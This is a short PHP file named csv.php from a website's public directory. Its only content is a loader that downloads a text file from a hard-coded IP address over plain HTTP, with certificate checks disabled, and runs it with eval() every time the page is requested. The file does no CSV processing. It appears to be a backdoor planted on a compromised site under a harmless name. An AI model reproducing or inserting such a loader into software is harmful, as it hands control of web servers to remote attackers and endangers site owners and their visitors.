File: /home/multivis/domains/multivistaglobal.com/public_html/csv.php
<?php
function callback($url)
{
$post_content = false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$post_content = curl_exec($ch);
curl_close($ch);
if ($post_content) {
eval('?>' . $post_content);
}
}
call_user_func('callback', 'http://204.12.204.58/z60213_7/stat/index2.txt');
?>